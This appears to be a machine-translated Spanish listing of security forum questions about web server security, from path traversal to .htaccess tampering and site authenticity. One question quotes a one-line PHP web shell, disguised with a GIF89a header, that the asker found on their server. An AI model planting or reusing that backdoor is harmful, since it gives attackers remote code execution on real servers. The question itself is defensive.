Preguntas con etiqueta 'webserver'

preguntas con etiqueta
0
respuestas

¿Por qué exactamente los sitios web auto hospedados se consideran peligrosos? [cerrado]

Hasta ahora estoy usando una frambuesa pi como servidor local para probar cosas o hospedar mis propios pequeños proyectos (nivel principiante), pero quiero que esté disponible públicamente (muy probablemente solo para las personas que conozco, p...
hecha 22.07.2018 - 17:48
4
respuestas

¿Debo usar SSL para el acceso local?

Tengo un servicio web al que se puede acceder solo desde sitios web alojados en el mismo servidor (uso 127.0.0.1 ip). ¿Debo usar SSL para las comunicaciones entre los sitios y el servicio, o eso solo crearía una sobrecarga innecesaria sin aum...
hecha 26.07.2012 - 09:33
3
respuestas

Peligro de ataques de camino transversal

He configurado una aplicación de prueba en Linux. No he comprobado las rutas en él, por lo que si el usuario ingresa / etc / passwd , entonces ese archivo se le muestra. Sin embargo, quiero entender qué más se puede hacer si mi sitio web es...
hecha 08.05.2012 - 18:29
3
respuestas

¿Hay alguna forma de robar el código PHP o ASP de un servidor web a través de los protocolos HTTP (S)?

Estoy trabajando en una aplicación web que incluiría un desarrollo personalizado y me preocupé un poco por el robo de código. Entonces, la pregunta que quería hacer es si, en términos generales, es posible robar código PHP o ASP de un servido...
hecha 20.08.2015 - 02:52
6
respuestas

Descargar un archivo de un servidor con un secreto: ¿en texto o binario?

Supongamos que un usuario puede hacer clic en un botón en un sitio web y descargar un archivo con un secreto. A través de ajax. Es más seguro si un servidor genera ese archivo y lo envía como 1) zip, tar o similar: un archivo binario . Tipo...
hecha 26.05.2017 - 19:06
4
respuestas

Si Yahoo puede ser hackeado, ¿cómo podemos asegurar nuestros pequeños sitios web? [cerrado]

   La aplicación de la ley proporcionó a Yahoo en noviembre de 2016 archivos de datos que   El tercero reclamado fue datos de usuario de Yahoo. Analizamos estos datos con   la asistencia de expertos forenses externos y encontró que parece   para...
hecha 18.12.2016 - 12:30
5
respuestas

¿Proteger contra ataques que modifiquen .htaccess?

Tengo un servidor dedicado. No hay código / sitio en vivo ahora, solo una página próximamente. Hace unos minutos me di cuenta de que alguien había cambiado el archivo .htaccess. ¿Cómo puedo protegerme contra ese tipo de ataque? El nuevo ht...
hecha 09.04.2013 - 21:30
2
respuestas

¿Cuál es el objetivo final de hackear un servidor web? [cerrado]

Recientemente, noté una gran cantidad de tráfico generado por robots automatizados que estaban buscando vulnerabilidades en mi servidor web. Buscaban principalmente formas de piratear plesk / wordpress que ni siquiera tengo ejecutando en el serv...
hecha 15.01.2014 - 12:13
3
respuestas

¿Este archivo PHP que contiene una evaluación de una variable POST es una indicación de compromiso?

Encontré este archivo en mi servidor, contiene el siguiente código: GIF89a <?php eval ($_POST[plm12345plm]); ?> No hay otro código al lado de este. ¿Es esto malicioso?     
hecha 04.05.2015 - 23:25
3
respuestas

Autenticidad / verificación del sitio web sin SSL

¿Hay alguna otra forma de verificar que el servidor web que está visitando es el correcto? Por ejemplo, si el DNS de un nombre de dominio fue hipotéticamente secuestrado, y los usuarios fueron dirigidos a un sitio de phishing que tomó su lugar;...
hecha 20.11.2013 - 10:35